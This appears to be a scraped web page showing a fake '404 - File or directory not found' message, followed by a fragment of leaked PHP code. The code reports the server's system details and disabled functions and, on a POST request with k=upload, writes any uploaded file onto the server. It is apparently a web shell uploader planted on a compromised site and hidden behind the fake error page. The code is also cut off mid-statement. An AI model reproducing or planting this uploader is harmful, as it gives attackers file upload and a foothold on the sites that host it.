404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"No never"; } } } ?>